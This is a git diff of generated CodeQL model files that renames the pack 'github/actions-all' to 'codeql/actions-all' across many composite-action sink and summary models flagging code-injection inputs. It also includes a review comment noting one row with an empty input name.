@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 4962f4f6281..896c7ab520a 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index 91c9e22df2a..50bfce009b0 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 760858b7eec..8cbaa9ccc74 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 8d219108234..e25e7fd7560 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-username", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index e889a394563..d1228eb3df9 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index 8f96daba8df..b987ca6683b 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 1e73f98b3d3..20060fa7445 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index c92eb434d47..297b47a3ff5 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 9de3892ac0c..16a0386beab 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index 2ae0b823187..37556bcb99d 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 8e2744b2de7..9532f50714e 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index bf2e23efba8..465b4145aeb 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index d8d86591302..b607b57693c 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index 1ac30a3790e..76243ecd600 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 1c05276abe0..68c5a0b4b69 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index c4b67ad5c58..2cf57246d0c 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index a4400dde9d4..9f62363e169 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index 8b5566b4996..0dfbad39abe 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index 349f66f4387..eb76e7d7a45 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index f717bf5c5d8..7672a6aadbb 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index b2a851a0dba..041705b1f55 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 054af41f284..b80d135bfb3 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 31eeed0d251..2e6fc133dd9 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 97adf115bd2..710cd795161 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index 926230e2282..e64c87b9e07 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index 0827f770e31..2d663b075be 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index 9314532b426..95b63bfadd0 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml 
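Review bot: In mozilla_bedrock.model.yml the sink row `["mozilla/bedrock", "*", "input.", "code-injection", "generated"]` names no input, because its third column stops at `input.` where every other row on this page has `input.<name>`. A row like this presumably matches no input of the action, so the code-injection sink it was generated for would go unreported without any error. The pack rename leaves the row untouched. Since the file is generated, the row should be regenerated with the real input name, and the generator should refuse to emit a row whose name is empty.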
+++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index 961ad291c0d..88da6f06637 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index d2a963c237e..841140aa12e 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 809fde33877..04657e223ad 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 002a93c1249..7541c5b8dab 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index 67404b9f311..2f4033d0825 100644 --- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index e4eb1d83db2..aeed286a882 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index fc29f5fc8ff..4d980520bc3 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 352d2550b89..26517905433 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 954216bb04e..af31a4267fd 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index dcb26733160..6317a72443c 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml 
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index 4608da8fe61..3b2bcb74bb6 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index e38ba9b4edf..320eabd533c 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 48a1bb5ca8b..3af9358c65e 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 744b025fa65..a61edccecf8 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index d6c91a3853c..2f7f8c15030 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index e49d896bce0..72601a40407 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 66240fb41c3..6808b4a2893 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index e9fbe3a2950..93c348e570a 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index bd94706b140..31be17adf41 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index 39324776e80..89f2daede97 100644 
--- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 80c781f72df..ce881a46225 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index abee0f74453..cd422d4278d 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 9a20261be90..82d25587bf9 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index a8c9d3fabce..e6c66721c3f 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index c222d5e1fd9..668e681473d 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 0a8427f29e4..13c965ae30a 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml 
